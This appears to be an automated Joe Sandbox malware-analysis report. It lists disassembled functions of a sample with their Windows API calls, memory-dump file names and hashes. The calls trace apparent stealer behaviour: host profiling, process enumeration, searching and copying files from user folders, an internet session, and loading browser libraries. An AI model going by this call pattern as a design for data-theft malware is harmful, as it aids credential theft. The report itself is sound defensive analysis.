Part of subcall function 00EF5A60: LocalFree.KERNEL32(00000000), ref: 00EF5BF2

Part of subcall function 00EF5C50: GetSystemPowerStatus.KERNEL32(?), ref: 00EF5C7D

GetCurrentProcessId.KERNEL32(00000000,?,01330F08,00000000,?,00EFE7CC,00000000,?,00000000,00000000,?,013303F8,00000000,?,00EFE7C8,00000000), ref: 00EF135E

Part of subcall function 00EF7380: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00EF7394
Part of subcall function 00EF7380: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00EF73B5
Part of subcall function 00EF7380: CloseHandle.KERNEL32(00000000), ref: 00EF73BF

Part of subcall function 00EF5CD0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF5D07
Part of subcall function 00EF5CD0: HeapAlloc.KERNEL32(00000000), ref: 00EF5D0E
Part of subcall function 00EF5CD0: RegOpenKeyExA.KERNEL32(80000002,0132A4D0,00000000,00020119,?), ref: 00EF5D2E
Part of subcall function 00EF5CD0: RegQueryValueExA.KERNEL32(?,01330E68,00000000,00000000,000000FF,000000FF), ref: 00EF5D4F
Part of subcall function 00EF5CD0: RegCloseKey.ADVAPI32(?), ref: 00EF5D62

Part of subcall function 00EF5E30: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00EF5E99
Part of subcall function 00EF5E30: GetLastError.KERNEL32 ref: 00EF5EA8

Part of subcall function 00EF5DA0: GetSystemInfo.KERNEL32(00EFE7D4), ref: 00EF5DD0
Part of subcall function 00EF5DA0: wsprintfA.USER32 ref: 00EF5DE6

Part of subcall function 00EF5FD0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01330368,00000000,?,00EFE7D4,00000000,?,00000000), ref: 00EF6000
Part of subcall function 00EF5FD0: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,01330368,00000000,?,00EFE7D4,00000000,?,00000000,00000000), ref: 00EF6007
Part of subcall function 00EF5FD0: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00EF6028
Part of subcall function 00EF5FD0: __aulldiv.LIBCMT ref: 00EF6042
Part of subcall function 00EF5FD0: __aulldiv.LIBCMT ref: 00EF6050
Part of subcall function 00EF5FD0: wsprintfA.USER32 ref: 00EF607C

Part of subcall function 00EF6690: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EFE7D0,00000000,?), ref: 00EF66FF
Part of subcall function 00EF6690: HeapAlloc.KERNEL32(00000000,?,?,?,?,00EFE7D0,00000000,?), ref: 00EF6706
Part of subcall function 00EF6690: wsprintfA.USER32 ref: 00EF6720

Part of subcall function 00EF61F0: RegOpenKeyExA.KERNEL32(00000000,0132DB68,00000000,00020019,00000000,00EFE146), ref: 00EF6274

Part of subcall function 00EF61F0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EF62F6
Part of subcall function 00EF61F0: wsprintfA.USER32 ref: 00EF6329
Part of subcall function 00EF61F0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00EF634B
Part of subcall function 00EF61F0: RegCloseKey.ADVAPI32(00000000), ref: 00EF635C
Part of subcall function 00EF61F0: RegCloseKey.ADVAPI32(00000000), ref: 00EF6369

Part of subcall function 00EF6550: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EF659A
Part of subcall function 00EF6550: Process32First.KERNEL32(?,00000128), ref: 00EF65AE
Part of subcall function 00EF6550: Process32Next.KERNEL32(?,00000128), ref: 00EF65C3
Part of subcall function 00EF6550: FindCloseChangeNotification.KERNEL32(?), ref: 00EF6631

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00EF193B

Part of subcall function 00EE4DE0: lstrlen.KERNEL32(00000000), ref: 00EE4E6A
Part of subcall function 00EE4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE4EDB
Part of subcall function 00EE4DE0: StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE4EF9

Strings

W@, xrefs: 00EF1961, 00EF198C, 00EF1964

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: W@
API String ID: 1035121393-2738247200
Opcode ID: bac4b32d1a6d6ad28c53bab068b79428cbbe26fa162032eddb26b1f091336473
Instruction ID: 339433e9e835ac8d43b082a84a8e8d0e6f5f33e9a2a7d54791aae3d85517d9c2
Opcode Fuzzy Hash: bac4b32d1a6d6ad28c53bab068b79428cbbe26fa162032eddb26b1f091336473
Instruction Fuzzy Hash: DE722B7281111CAACF19FF50DDA1EFE73B9AF54300F5162DAA216B24A1EF703B48CA55

Function 00EF4A23 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013214B8,?,00EFE988,?,00000000,?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF49FA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EF4A18
CloseHandle.KERNEL32(00000000), ref: 00EF4A29
Sleep.KERNEL32(00001770), ref: 00EF4A34
CloseHandle.KERNEL32(?,00000000,?,013214B8,?,00EFE988,?,00000000,?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF4A4A
ExitProcess.KERNEL32 ref: 00EF4A52

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 583f8164d92edd19ee7259a282c966b174e020f52925807ccd0d3670aac41a4e
Instruction ID: 1d4cd897fd3395da42a3ec37c38d57dbf6e42301c1bc6303c79ab77f12ea7faf
Opcode Fuzzy Hash: 583f8164d92edd19ee7259a282c966b174e020f52925807ccd0d3670aac41a4e
Instruction Fuzzy Hash: 0BF05470A8425DEEEB14ABA0DD0ABBF76B4AF04701F505424B722750C5EBF159409B59

Function 00EE6750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

pi, xrefs: 00EE67E2, 00EE68BF, 00EE68A4, 00EE67BE, 00EE686E

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID:
String ID: pi
API String ID: 0-233653632
Opcode ID: bc41aa766071478b5793bea32d7685dd5ee42a7c802a329355a02fbc0f626b5c
Instruction ID: 2cd381573ce5ce1176ad3ec91e98a67b7e30a69031721fe66fe794d413a13dd1
Opcode Fuzzy Hash: bc41aa766071478b5793bea32d7685dd5ee42a7c802a329355a02fbc0f626b5c
Instruction Fuzzy Hash: 066125B4D0024CEBCB14CF95D984BEEB7B0BB58348F109598E4057B241D775AE84DFA1

Function 00EE4490 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF6800: malloc.MSVCRT ref: 00EF6808

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4516
InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4526

Strings

<, xrefs: 00EE44A9

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 00e70b37600d79ade8245cb5c2e530e542c08f9b8919a4fb56a06e9b34615df2
Instruction ID: 96af5453d04b475be4bc590ccbe29bb31912294add7ccbbb1988b5286e6830fa
Opcode Fuzzy Hash: 00e70b37600d79ade8245cb5c2e530e542c08f9b8919a4fb56a06e9b34615df2
Instruction Fuzzy Hash: 67211DB5D0024DABDF14EFA4E845AED7BB5AF44360F104229FA25B72C1EF706A05CB91

Function 00EF3B30 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00EF6D1B

lstrcat.KERNEL32(?,00000000), ref: 00EF3B6A
lstrcat.KERNEL32(?,00EFE958), ref: 00EF3B87
lstrcat.KERNEL32(?,0132D7D8), ref: 00EF3B9B
lstrcat.KERNEL32(?,00EFE95C), ref: 00EF3BAD

Part of subcall function 00EF3560: wsprintfA.USER32 ref: 00EF3579
Part of subcall function 00EF3560: FindFirstFileA.KERNEL32(?,?), ref: 00EF3590

Part of subcall function 00EF3560: StrCmpCA.SHLWAPI(?,00EFE8C4), ref: 00EF35BE
Part of subcall function 00EF3560: StrCmpCA.SHLWAPI(?,00EFE8C8), ref: 00EF35D4
Part of subcall function 00EF3560: FindNextFileA.KERNEL32(000000FF,?), ref: 00EF37A9
Part of subcall function 00EF3560: FindClose.KERNEL32(000000FF), ref: 00EF37BE

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 0b15d177a4674649ada9a326dc324dafdcf519241371beb8d62c07716205cce1
Instruction ID: 06218674c3223a01cb41a32082103112e853eee1d5759e768fb91145884c2e50
Opcode Fuzzy Hash: 0b15d177a4674649ada9a326dc324dafdcf519241371beb8d62c07716205cce1
Instruction Fuzzy Hash: 8321CBB690030C6BCB18FB60DC46DEE37BD9B54701F0041A4B75A66184EEB0A7C8CF51

Function 00EEFE10 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0132D5D8), ref: 00EEFE5E
StrCmpCA.SHLWAPI(00000000,0132D5F8), ref: 00EEFF0C
StrCmpCA.SHLWAPI(00000000,0132D478), ref: 00EF0025

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: cfc93ffea6274ffb5a942777c939ce95605a422c351276286802dabd2ab3a818
Instruction ID: ed03faa7b994aa3af293c569f780f85c13f9a0ea1b2bff16b2432d43df0c8adf
Opcode Fuzzy Hash: cfc93ffea6274ffb5a942777c939ce95605a422c351276286802dabd2ab3a818
Instruction Fuzzy Hash: 68816775A1020C9BCF08EF74D5919AD77F9BF94300F109569F9169B256EF30EA05CB81

Function 00EEFE2F Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0132D5D8), ref: 00EEFE5E
StrCmpCA.SHLWAPI(00000000,0132D5F8), ref: 00EEFF0C
StrCmpCA.SHLWAPI(00000000,0132D478), ref: 00EF0025

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: cc070087d644f7eb5e91b6026642121de53d641ed20f14c4539b410fe12c72a6
Instruction ID: 14339bb540760f69f547eb0147fe8276dc738ac8c426a19c6a44964b665f08b9
Opcode Fuzzy Hash: cc070087d644f7eb5e91b6026642121de53d641ed20f14c4539b410fe12c72a6
Instruction Fuzzy Hash: 1A816575A10208DFCF0CEF64D6919ADB7F9BF94300B109569F416AB296EF30EA05CB80

Function 00EF37D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00EF6D1B

lstrcat.KERNEL32(?,00000000), ref: 00EF380A
lstrcat.KERNEL32(?,01330CE8), ref: 00EF3828

Part of subcall function 00EF3560: wsprintfA.USER32 ref: 00EF3579
Part of subcall function 00EF3560: FindFirstFileA.KERNEL32(?,?), ref: 00EF3590

Part of subcall function 00EF3560: StrCmpCA.SHLWAPI(?,00EFE8C4), ref: 00EF35BE
Part of subcall function 00EF3560: StrCmpCA.SHLWAPI(?,00EFE8C8), ref: 00EF35D4
Part of subcall function 00EF3560: FindNextFileA.KERNEL32(000000FF,?), ref: 00EF37A9
Part of subcall function 00EF3560: FindClose.KERNEL32(000000FF), ref: 00EF37BE

Part of subcall function 00EF3560: wsprintfA.USER32 ref: 00EF35FA
Part of subcall function 00EF3560: StrCmpCA.SHLWAPI(?,00EFE497), ref: 00EF360C
Part of subcall function 00EF3560: wsprintfA.USER32 ref: 00EF3629
Part of subcall function 00EF3560: PathMatchSpecA.SHLWAPI(?,?), ref: 00EF365F
Part of subcall function 00EF3560: lstrcat.KERNEL32(?,0132D748), ref: 00EF368B
Part of subcall function 00EF3560: lstrcat.KERNEL32(?,00EFE8E0), ref: 00EF369D
Part of subcall function 00EF3560: lstrcat.KERNEL32(?,?), ref: 00EF36AE
Part of subcall function 00EF3560: lstrcat.KERNEL32(?,00EFE8E4), ref: 00EF36C0
Part of subcall function 00EF3560: lstrcat.KERNEL32(?,?), ref: 00EF36D4
Part of subcall function 00EF3560: CopyFileA.KERNEL32(?,?,00000001), ref: 00EF36EA
Part of subcall function 00EF3560: DeleteFileA.KERNEL32(?), ref: 00EF3769

Part of subcall function 00EF3560: wsprintfA.USER32 ref: 00EF364B

Strings

ZB, xrefs: 00EF384C, 00EF387B, 00EF38AB, 00EF38DA, 00EF390A, 00EF3939, 00EF395B, 00EF384F, 00EF387E, 00EF38AE, 00EF38DD, 00EF390D, 00EF393C

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: ZB
API String ID: 2104210347-4054800922
Opcode ID: 75afbee314863b0408f5bed3969d76107b068f182dd05d34f358dfd77243fbfa
Instruction ID: 1ab85b36326b55b224786957ad80271651d9bad65268209504e86b56289421d3
Opcode Fuzzy Hash: 75afbee314863b0408f5bed3969d76107b068f182dd05d34f358dfd77243fbfa
Instruction Fuzzy Hash: 524126B690024CABCB59EB64DC82DEE377A9794700F005158B65B67145EAB0ABC8CFA1

Function 00EF57B0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EF495B), ref: 00EF57E0
HeapAlloc.KERNEL32(00000000,?,?,?,00EF495B), ref: 00EF57E7
GetComputerNameA.KERNEL32(?,00000104), ref: 00EF57FF

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: e5ae7c5fafedb3976094a7e66b7bf21f88022f2026b09e9a51692ff16e0681a4
Instruction ID: 64c85d8b205c30e79fb9b5bd74bf38dbde1bd13fd1530e9b0121771f97b6b57d
Opcode Fuzzy Hash: e5ae7c5fafedb3976094a7e66b7bf21f88022f2026b09e9a51692ff16e0681a4
Instruction Fuzzy Hash: F4016DB2E44649EBCB24CF99D945BAABBB8FB04751F100129F716E2280D3745900CBA1

Function 6C4D3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C4D3095

Part of subcall function 6C4D35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C55F688,00001000), ref: 6C4D35D5
Part of subcall function 6C4D35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4D35E0
Part of subcall function 6C4D35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C4D35FD
Part of subcall function 6C4D35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C4D363F
Part of subcall function 6C4D35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C4D369F
Part of subcall function 6C4D35A0: __aulldiv.LIBCMT ref: 6C4D36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4D309F

Part of subcall function 6C4F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C4F56EE,?,00000001), ref: 6C4F5B85
Part of subcall function 6C4F5B50: EnterCriticalSection.KERNEL32(6C55F688,?,?,?,6C4F56EE,?,00000001), ref: 6C4F5B90
Part of subcall function 6C4F5B50: LeaveCriticalSection.KERNEL32(6C55F688,?,?,?,6C4F56EE,?,00000001), ref: 6C4F5BD8
Part of subcall function 6C4F5B50: GetTickCount64.KERNEL32 ref: 6C4F5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C4D30BE

Part of subcall function 6C4D30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C4D3127
Part of subcall function 6C4D30F0: __aulldiv.LIBCMT ref: 6C4D3140

Part of subcall function 6C50AB2A: __onexit.LIBCMT ref: 6C50AB30

Memory Dump Source

Source File: 00000000.00000002.1883807257.000000006C4D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.1883788263.000000006C4D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1883923947.000000006C55E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1883978275.000000006C562000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_i3NmF0obCm.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: dc9ba6dc67c29752abec7210b57982786cf2620e7d1ab562632767205609725d
Instruction ID: 66097be16bfdabe81cced5cd634c997d94d1efe024e7a8a03a8a637d5ed1624c
Opcode Fuzzy Hash: dc9ba6dc67c29752abec7210b57982786cf2620e7d1ab562632767205609725d
Instruction Fuzzy Hash: 6CF02D32E2074897CB10EF348C916E77770AFAB114F92531DE845535A1FB2071D883C9

Function 00EF7380 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00EF7394
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00EF73B5
CloseHandle.KERNEL32(00000000), ref: 00EF73BF

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 4cc2fdd379fb9fc66cf0e6c96cdd278ffbfd4fbb3e54b7fc934f4af293078940
Instruction ID: b8f0d20acbc5e493151349f0bec53dd9152ce2f1e35750f8baff13a4cdf03327
Opcode Fuzzy Hash: 4cc2fdd379fb9fc66cf0e6c96cdd278ffbfd4fbb3e54b7fc934f4af293078940
Instruction Fuzzy Hash: 50F0F475D4020CFBDB19DFA4D94AFED7778EB08704F108558BB1557284D6B06E84DB90

